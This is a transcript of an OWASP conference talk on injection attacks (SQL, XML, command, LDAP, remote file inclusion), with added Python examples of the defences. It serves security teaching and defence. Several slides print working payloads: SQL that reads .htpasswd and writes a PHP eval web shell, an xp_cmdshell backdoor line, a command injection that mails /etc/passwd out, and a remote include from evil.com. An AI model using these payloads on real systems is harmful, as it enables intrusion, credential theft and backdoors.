Owasp Top 10 A1: Injection

Owasp A1: Injection, 25 Jan 2014: Dubai, UAE. Michael Hendrickx, Information Security Consultant ([email protected])

Posted 22-Jan-2018 (upload: michael-hendrickx)

Page 1: Owasp Top 10 A1: Injection

Owasp A1: Injection
25 Jan 2014: Dubai, UAE.

Michael Hendrickx, Information Security Consultant
([email protected])

Page 2: Owasp Top 10 A1: Injection

Owasp Top 10 - 2013
• A1: Injection
• A2: Broken Authentication and Session Mgmt
• A3: Cross Site Scripting
• A4: Insecure Direct Object References
• A5: Security Misconfiguration
• A6: Sensitive Data Exposure
• A7: Missing Function Level Access Control
• A8: Cross Site Request Forgery
• A9: Using Components with Known Vulns
• A10: Unvalidated Redirects and Forwards

Page 3: Owasp Top 10 A1: Injection

How bad is it?

• Oct ’13: 100k $ stolen from a California ISP
http://thehackernews.com/2013/10/hacker-stole-100000-from-users-of.html

• Jun ’13: Hackers cleared Turkish people’s bills for water, gas, telephone…
http://news.softpedia.com/news/RedHack-Breaches-Istanbul-Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml

• Nov ’12: 150k Adobe user accounts stolen
http://www.darkreading.com/attacks-breaches/adobe-hacker-says-he-used-sql-injection/240134996

• Jul ’12: 450k Yahoo! user accounts stolen
http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your-account-safe/

Page 4: Owasp Top 10 A1: Injection

What is Injection?

• Web applications became more complex
– Database driven
– Extra functionality (email, ticket booking, ..)

• Submitted data has a special meaning to underlying technologies

• Types:
– SQL Injection
– XML Injection
– Command Injection

[Diagram: Web → DB / OS / Backend System]

Page 5: Owasp Top 10 A1: Injection

What underlying technologies?

• A webserver parses data and “passes it on”

[Diagram: Web Server → DB / OS]

http://somesite.com/msg.php?id=8471350

The script performs business logic and passes messages to the backend: “Hey, get me a message from the DB with id 8471350”

Page 6: Owasp Top 10 A1: Injection

SQL Injection: Database Query

• Dynamic script to look up data in DB

[Diagram: Web Server → DB]

http://somesite.com/login.aspx?name=michael&password=secret123

SELECT * FROM users WHERE name = 'michael' AND password = 'secret123'

http://somesite.com/msg.php?id=8471350

SELECT * FROM messages WHERE id = 8471350

Get indirect access to the database

Page 7: Owasp Top 10 A1: Injection

SQL Injection: Database Query

• Insert value with ' (single quote)
– The single quote is the string delimiter in SQL queries

[Diagram: Web Server → DB]

http://somesite.com/login.php?login=mich'ael&password=secret123

SELECT * FROM users WHERE name = 'mich'ael' AND password = 'secret123'

The query is malformed and will throw an error (if errors are not suppressed).


Page 9: Owasp Top 10 A1: Injection

SQL Injection: Database Query

• Insert value with ' (single quote)

[Diagram: Web Server → DB]

http://somesite.com/login.php?login=michael&password=test' OR 'a' = 'a

SELECT * FROM users WHERE name = 'michael' AND password = 'test' OR 'a' = 'a'

'a' will always equal 'a', so the query returns a row and the user is logged in.
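The three outcomes of slides 6 to 9 (a normal login, the stray quote that breaks the statement, and the OR 'a' = 'a' bypass) can be reproduced side by side against an in-memory database, and compared with the prepared-statement fix that slide 26 recommends. This is an added example written for this page, not code from the slides; it uses Python's bundled sqlite3 module, a constructed users table with one row, and stores the password in clear text only because the slide's query does (a real application compares a salted hash).

```python
import sqlite3

# Constructed sample data mirroring the slide: one user, plaintext password.
SAMPLE_USERS = [("michael", "secret123")]


def make_db():
    """In-memory SQLite database seeded with the constructed sample user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT NOT NULL, password TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_concatenated(conn, name, password):
    """The vulnerable pattern from the slides: user input spliced into the SQL text.

    Returns "ok", "denied" or "error" so the three slide outcomes can be observed:
    valid login, syntax error from a stray quote, bypass with OR 'a' = 'a'.
    """
    query = "SELECT * FROM users WHERE name = '%s' AND password = '%s'" % (name, password)
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error:
        return "error"  # slide 7: the stray quote leaves a malformed statement
    return "ok" if row else "denied"


def login_prepared(conn, name, password):
    """The hardened pattern: a prepared statement with bound parameters.

    The SQL text is fixed; the driver passes the values separately, so a quote
    or an OR clause inside the password is compared as data, never parsed as SQL.
    """
    query = "SELECT * FROM users WHERE name = ? AND password = ?"
    row = conn.execute(query, (name, password)).fetchone()
    return "ok" if row else "denied"


if __name__ == "__main__":
    db = make_db()
    for pw in ("secret123", "test' OR 'a' = 'a"):
        print("concatenated:", login_concatenated(db, "michael", pw),
              "| prepared:", login_prepared(db, "michael", pw))
    print("concatenated, quote in name:", login_concatenated(db, "mich'ael", "secret123"))
```

The parameter placeholder is `?` for sqlite3; other drivers use `%s` or `:name`, but the principle is the same: the statement text never changes with user input, so there is nothing for a quote to terminate.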

Page 10: Owasp Top 10 A1: Injection

SQL Injection: Database Query

• “Direct” access to database
• Possible to issue CRUD statements, and more

http://xkcd.com/327/

Page 11: Owasp Top 10 A1: Injection

SQL Injection: Database Query

• More advanced possibilities:
– Read files*:
• MySQL:
SELECT HEX(LOAD_FILE('/var/www/site.com/admin/.htpasswd')) INTO DUMPFILE '/var/www/site.com/htdocs/test.txt';

• MS SQL:
CREATE TABLE newfile(data text);
...
BULK INSERT newfile FROM 'C:\secretfile.dat' WITH (CODEPAGE='RAW', FIELDTERMINATOR='|', ROWTERMINATOR='---');

*: If you have the right privileges

Page 12: Owasp Top 10 A1: Injection

SQL Injection: Database Query

• Write files*
– MySQL:
CREATE TABLE tmp(data longblob);
INSERT INTO tmp(data) VALUES(0x3c3f7068);
UPDATE tmp SET data=CONCAT(data, 0x20245f...);
...
SELECT data FROM tmp INTO DUMPFILE '/var/www/site.com/htdocs/test.php';

(the hex bytes assembled above spell out: <?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?>)

– MS SQL:
EXEC xp_cmdshell('echo ... >> backdoor.aspx');

*: Again, if you have the right privileges

Page 13: Owasp Top 10 A1: Injection

SQL Injection: Database Query

• SQL Map will perform attacks on a target.
• Dumps entire tables
• Even entire databases.
• Stores everything in CSV

• More info on http://sqlmap.org

Page 14: Owasp Top 10 A1: Injection

HTML Injection

• Possible to include HTML tags in fields
• Used to render “special” HTML tags where normal text is expected
• XSS possible, rewrite the DOM

Page 15: Owasp Top 10 A1: Injection

HTML Injection

• Possible to insert iframes, fake forms, JS, …
• Can be used in a phishing attack

The button goes to a different form, potentially stealing credentials.
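The fake-form case above is defeated by encoding user text on output rather than trusting it. As an added illustration (not code from the slides), the following renders a constructed comment containing a fake login form first unescaped and then through html.escape, and checks whether any live tag survives; the comment text and the `phish.example` host are made up for the demo.

```python
import html

# Constructed comment text of the kind slide 15 describes: a fake login form
# injected where plain text was expected. The host name is fictional.
CONSTRUCTED_COMMENT = (
    'Nice article! <form action="http://phish.example/login">'
    '<input name="password" type="password"><button>Re-login</button></form>'
)

# The page's own markup; only the {body} slot receives user-controlled text.
PAGE = '<div class="comment">{body}</div>'


def render_comment_unsafe(body):
    """Vulnerable: user text is dropped straight into the page, tags and all."""
    return PAGE.format(body=body)


def render_comment_safe(body):
    """Hardened: encode &, <, >, " and ' so the browser shows them as text."""
    return PAGE.format(body=html.escape(body, quote=True))


def contains_live_tags(rendered):
    """Demo check: does a <form>, <iframe> or <script> tag survive in the output?"""
    lowered = rendered.lower()
    return any(tag in lowered for tag in ("<form", "<iframe", "<script"))


if __name__ == "__main__":
    print(render_comment_unsafe(CONSTRUCTED_COMMENT))
    print(render_comment_safe(CONSTRUCTED_COMMENT))
```

Output encoding is context-specific: html.escape is right for text between tags and for quoted attribute values, but a value placed inside a URL, a script block or a CSS rule needs the encoder for that context.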

Page 16: Owasp Top 10 A1: Injection

XML Injection

• Web app talks to backend web services
• Web app’s logic converts parameters to XML web services (as SOAP, …)

[Diagram: Web Server → Web service → DB / Backend]

Page 17: Owasp Top 10 A1: Injection

XML Injection

Web app to create a new user:

http://somesite.com/create.php?name=michael&[email protected]

<?xml version="1.0" encoding="ISO-8859-1" ?>
<user>
  <status>new</status>
  <admin>false</admin>
  <date>25 Jan 2014, 13:10:01</date>
  <name>$name</name>
  <email>$email</email>
</user>

http://somesite.com/create.php?name=michael&[email protected]</email><admin>true</admin><email>[email protected]

<?xml version="1.0" encoding="ISO-8859-1" ?>
<user>
  <status>new</status>
  <admin>false</admin>
  <date>25 Jan 2014, 13:24:48</date>
  <name>michael</name>
  <email>[email protected]</email>
  <admin>true</admin>
  <email>[email protected]</email>
</user>
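The $name/$email template above is string substitution, which is why a closing tag inside the e-mail value can add a second <admin> element. As an added example (not the slides' code), the following builds the same document both ways, with a made-up `example.com` payload in place of the slide's address, and shows what a backend that reads the <admin> elements would see in each case; the e-mail pattern is a deliberately simple format check of the kind slide 26 calls "force formats".

```python
import re
import xml.etree.ElementTree as ET

# Constructed payload in the shape of slide 17; the addresses are fictional.
CONSTRUCTED_EMAIL_PAYLOAD = (
    "m@example.com</email><admin>true</admin><email>m@example.com"
)

# The slide's template without the XML declaration (kept out for the demo).
TEMPLATE = (
    "<user><status>new</status><admin>false</admin>"
    "<date>{date}</date><name>{name}</name><email>{email}</email></user>"
)

# Simple format check; a real validator would be stricter, but even this one
# rejects anything containing '<' or '>'.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def validate_email(email):
    return bool(EMAIL_RE.match(email))


def build_user_xml_unsafe(name, email, date):
    """Vulnerable: the $name/$email substitution from the slide."""
    return TEMPLATE.format(name=name, email=email, date=date)


def build_user_xml_safe(name, email, date):
    """Hardened: build the tree with an XML API, which escapes <, > and & in text
    nodes, so the payload stays inside a single <email> element."""
    user = ET.Element("user")
    ET.SubElement(user, "status").text = "new"
    ET.SubElement(user, "admin").text = "false"
    ET.SubElement(user, "date").text = date
    ET.SubElement(user, "name").text = name
    ET.SubElement(user, "email").text = email
    return ET.tostring(user, encoding="unicode")


def create_user_xml(name, email, date):
    """What create.php should do: validate the format, then serialise safely."""
    if not validate_email(email):
        raise ValueError("email does not match the expected format")
    return build_user_xml_safe(name, email, date)


def admin_flags(xml_text):
    """What a backend sees: the text of every <admin> element, in document order."""
    root = ET.fromstring(xml_text)
    return [e.text for e in root.findall("admin")]


if __name__ == "__main__":
    d = "25 Jan 2014, 13:24:48"
    print(admin_flags(build_user_xml_unsafe("michael", CONSTRUCTED_EMAIL_PAYLOAD, d)))
    print(admin_flags(build_user_xml_safe("michael", CONSTRUCTED_EMAIL_PAYLOAD, d)))
```

Either layer alone stops this particular payload; both together are the defence-in-depth the later slides ask for, since the serialiser protects the document structure even when a validator is loosened later.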

Page 18: Owasp Top 10 A1: Injection

Command Injection

• Web application performs Operating System tasks
– Execute external programs / scripts
– List files
– Send email

[Diagram: Web Server → OS]

Page 19: Owasp Top 10 A1: Injection

Command Injection

• Dynamic script to share an article

[Diagram: Web Server → DB / OS]

http://somesite.com/[email protected]

$ echo "check this out" | mail -s "share" [email protected]

http://somesite.com/[email protected];[email protected]+<+/etc/passwd

$ echo "check this out" | mail -s "share" [email protected]; mail [email protected] < /etc/passwd
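The share script above fails because the recipient is pasted into a string that a shell parses, so `;` starts a second command. As an added example (not the slides' code), the following contrasts that pattern with calling the program directly with an argument list, plus format validation of the recipient; `echo` stands in for `mail` so it runs without a mail system, and the constructed payload's injected command is a harmless second `echo`.

```python
import re
import shlex
import subprocess

# Simple recipient format check (slide 26, "force formats"); rejects ';', '|', '<'.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# Constructed recipient value shaped like the slide's payload; the injected
# command is only `echo INJECTED` so the demo has no side effects.
CONSTRUCTED_PAYLOAD = "a@example.com; echo INJECTED"


def is_valid_email(addr):
    return bool(EMAIL_RE.match(addr))


def notify_shell_string(recipient):
    """Vulnerable pattern: the recipient is concatenated into a command string
    that /bin/sh parses, so ';', '|', '<' and '$(...)' are treated as syntax.
    `echo` stands in for the slide's `mail`."""
    cmd = "echo shared-with " + recipient
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def notify_argv(recipient):
    """Hardened pattern: no shell at all; the recipient is a single argv element,
    so the whole string, metacharacters included, reaches the program as data."""
    return subprocess.run(["echo", "shared-with", recipient],
                          capture_output=True, text=True).stdout


def quoted_command(recipient):
    """If a shell string is unavoidable, quote every untrusted value with shlex
    so the shell sees one word; returns the command string rather than running it."""
    return "echo shared-with " + shlex.quote(recipient)


def share_article(recipient):
    """What the share script should do: validate, then call without a shell."""
    if not is_valid_email(recipient):
        raise ValueError("recipient is not a single e-mail address")
    return notify_argv(recipient)


if __name__ == "__main__":
    print(repr(notify_shell_string(CONSTRUCTED_PAYLOAD)))
    print(repr(notify_argv(CONSTRUCTED_PAYLOAD)))
    print(quoted_command(CONSTRUCTED_PAYLOAD))
```

Validation and the argument-list call are independent layers: the list form is what removes the shell from the picture, while the format check keeps the application's own semantics (one recipient, not a list of shell words) intact.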

Page 20: Owasp Top 10 A1: Injection

LDAP Injection

• Lightweight Directory Access Protocol
• LDAP is used to access information directories
– Users
– User information
– Software
– Computers

[Diagram: Web Server → LDAP Server]

Page 21: Owasp Top 10 A1: Injection

LDAP Injection

• Insert special characters, such as (, |, &, *, …
• * (asterisk) allows listing of all users

http://www.networkdls.com/articles/ldapinjection.pdf
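The special characters listed above only have meaning if they reach the directory unescaped. As an added example (not from the slides or the linked paper), the following builds a user-lookup filter the vulnerable way and with the value escaping that RFC 4515 defines for search filters, where `*`, `(`, `)`, `\` and NUL inside a value become `\2a`, `\28`, `\29`, `\5c` and `\00`; the filter shape `(&(objectClass=person)(uid=...))` is an assumption for the demo.

```python
import re

# RFC 4515 escapes for characters that are special inside a filter value.
_LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}

# Optional stricter layer: usernames the application actually issues.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def escape_ldap_filter_value(value):
    """Escape one value for use inside an LDAP search filter (RFC 4515)."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def user_lookup_filter_unsafe(username):
    """Vulnerable: the username is spliced in, so '*' matches every uid and
    parentheses can reshape the filter."""
    return "(&(objectClass=person)(uid=%s))" % username


def user_lookup_filter_safe(username):
    """Hardened: the value is escaped, so it can only ever match a literal uid."""
    return "(&(objectClass=person)(uid=%s))" % escape_ldap_filter_value(username)


def user_lookup_filter(username):
    """What the login code should call: reject implausible names, then escape."""
    if not USERNAME_RE.match(username):
        raise ValueError("username contains characters the application never issues")
    return user_lookup_filter_safe(username)


if __name__ == "__main__":
    for name in ("michael", "*", "mich)(uid=*"):
        print(user_lookup_filter_unsafe(name), "|", user_lookup_filter_safe(name))
```

Escaping is what makes the filter correct for any input; the username pattern on top of it is the "force formats" rule from the protection slides and also gives the application a cheap place to log and alert on attempts.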

Page 22: Owasp Top 10 A1: Injection

Remote File Injection

• Scripts include other files to extend functionality
• Why? Clarity, reuse of functionality
– PHP:
• include(), require(), require_once(), …
– Aspx:
• <!-- #include "…" -->
– JSP:
• <%@ include file="…" %>

Page 23: Owasp Top 10 A1: Injection

Remote File Injection

• Color chooser
• The color parameter loads a new file with color codes (blue.php, red.php, …)
• An attacker can upload a malicious PHP file to an external server and point the parameter at it

http://somesite.com/mypage.php?color=blue

<?php if(isset($_GET['color'])){ include($_GET['color'].'.php'); }?>

http://somesite.com/mypage.php?color=http://evil.com/evil.txt?

Page 24: Owasp Top 10 A1: Injection

Remote (HTML) File Injection

• Theme chooser
• Can input external HTML files
– That can contain JavaScript, XSS, rewrite the DOM, etc...
• Also verify cookie contents, …

http://somesite.com/set_theme.php?theme=fancy

<link href="/themes/<? print $_COOKIE['theme'] ?>.css" rel="stylesheet" type="text/css" />
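Both the color include (slide 23) and the theme cookie (slide 24) have the same fix: never build a file name or URL from the raw value, but map it through an allowlist or a strict pattern. As an added example (not the slides' PHP), the following does that in Python for both cases; the directory paths, the allowed color names and the `default` theme are assumptions for the demo.

```python
import os
import re

# Assumed layout and allowlist, constructed for this example.
INCLUDE_DIR = "/var/www/site.com/includes"
ALLOWED_COLORS = {"blue", "red", "green"}

# Theme names the application issues: short, lowercase, no slashes or quotes.
SAFE_NAME_RE = re.compile(r"^[a-z0-9_-]{1,32}$")


def resolve_include(color, allowed=ALLOWED_COLORS, base=INCLUDE_DIR):
    """Map an untrusted 'color' parameter to a local file path, or None if rejected.

    Two layers: the value must be in the allowlist, and the resulting path must
    still sit directly inside `base` after normalisation (defence in depth
    against a later allowlist entry that contains a slash or '..').
    """
    if color not in allowed:
        return None
    path = os.path.normpath(os.path.join(base, color + ".php"))
    if os.path.dirname(path) != os.path.normpath(base):
        return None
    return path


def theme_stylesheet_href(theme_cookie, default="default"):
    """Build the href for the <link> on slide 24 from a cookie value.

    Cookie contents are attacker-controlled just like query parameters, so the
    value is checked against a strict pattern and otherwise replaced by a default.
    """
    name = theme_cookie if theme_cookie and SAFE_NAME_RE.match(theme_cookie) else default
    return "/themes/%s.css" % name


if __name__ == "__main__":
    for c in ("blue", "http://evil.example/evil.txt?", "../admin/.htpasswd"):
        print(repr(c), "->", resolve_include(c))
    for t in ("fancy", '"><script>', None):
        print(repr(t), "->", theme_stylesheet_href(t))
```

The allowlist is the real control; the path check behind it costs one line and catches the day someone adds `"../shared"` to the allowed set without thinking about it.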

Page 25: Owasp Top 10 A1: Injection

Protect against Injection Attacks (1)

• Implement a Web Application Firewall (WAF)
• Prevents most common attacks
– Not 100% foolproof
• Make sure it can decrypt SSL

[Diagram: Web Server, DB, WAF]

Page 26: Owasp Top 10 A1: Injection

Protect against Injection Attacks (2)

• Validate user input, all input:
– Never trust user input, ever.
– Even stored input (for later use)
– Force formats (numbers, email addresses, dates…)
– HTTP form fields, HTTP referers, cookies, …

• Apply secure coding standards
– Use prepared SQL statements
– Vendor specific guidelines
– OWASP secure coding practices:
https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf

Page 27: Owasp Top 10 A1: Injection

Protect against Injection Attacks (3)

• Adopt least-privilege policies
– Give DB users least privileges
– Use multiple DB users
– Run processes with restricted privileges
– Restrict permissions on directories
• Do your web directories really need to be writable?

• Run in a sandboxed environment
• Suppress error messages
• Enable exception notifications
– If something strange happens, reset the session and notify an administrator.

Page 28: Owasp Top 10 A1: Injection

So what’s next?

• Don’t trust your user input.
• Don’t trust your user input.
• Adopt secure coding policies
• Implement defense in depth
• Do log analysis to detect anomalies
• And don’t trust your user input.
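The "log analysis to detect anomalies" point is the one the deck leaves without a concrete shape. As an added example (not from the slides), the following scans common-log-format access lines for the injection patterns the deck covers, working on the URL-decoded value of each query parameter rather than the raw request line; the four sample lines are constructed for the demo and replay the slides' own requests against a fictional site with documentation IP addresses, and the rule set is deliberately small.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (common log format) replaying the requests from
# the slides: one benign lookup, then the SQL, remote-include and command cases.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Jan/2014:13:10:01 +0400] "GET /msg.php?id=8471350 HTTP/1.1" 200 512
203.0.113.7 - - [25/Jan/2014:13:10:09 +0400] "GET /login.php?login=michael&password=test%27+OR+%27a%27+%3D+%27a HTTP/1.1" 302 0
203.0.113.7 - - [25/Jan/2014:13:11:42 +0400] "GET /mypage.php?color=http%3A%2F%2Fevil.example%2Fevil.txt%3F HTTP/1.1" 200 2048
203.0.113.9 - - [25/Jan/2014:13:12:30 +0400] "GET /share.php?email=a%40example.com%3Bmail+b%40example.com+%3C+%2Fetc%2Fpasswd HTTP/1.1" 500 0
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is applied to the decoded value of every query parameter.
RULES = {
    "sql": re.compile(r"'\s*(or|and)\s+|union\s+select|--\s*$", re.IGNORECASE),
    "cmd": re.compile(r"[;|`]|\$\("),
    "rfi": re.compile(r"^(https?|ftp|php|data)://", re.IGNORECASE),
    "xml": re.compile(r"</?[a-z][\w:-]*\s*/?>", re.IGNORECASE),
}


def parse_line(line):
    """Parse one access-log line into ip, timestamp, path, status and decoded params."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params = parse_qsl(parts.query, keep_blank_values=True)
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path,
            "status": int(m.group("status")), "params": params}


def scan_log(text):
    """Return one finding per (parameter, rule) match across all parsable lines."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for key, value in rec["params"]:
            for rule, pattern in RULES.items():
                if pattern.search(value):
                    findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                                     "param": key, "rule": rule, "value": value})
    return findings


def hits_per_ip(findings):
    """Aggregate findings by client address, the usual pivot for an alert threshold."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["rule"], f["path"], f["param"], repr(f["value"]))
    print(hits_per_ip(scan_log(SAMPLE_LOG)))
```

Decoding before matching matters: the slide's payload arrives as `%27+OR+%27a%27` and a rule run on the raw line would miss it. Note also that POST bodies and cookies never appear in the access log, so this catches only what travels in the query string; the application's own validation failures (slide 27's "exception notifications") are the log source for the rest.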

Page 29: Owasp Top 10 A1: Injection

Thank you!

Michael Hendrickx ([email protected])

@ndrix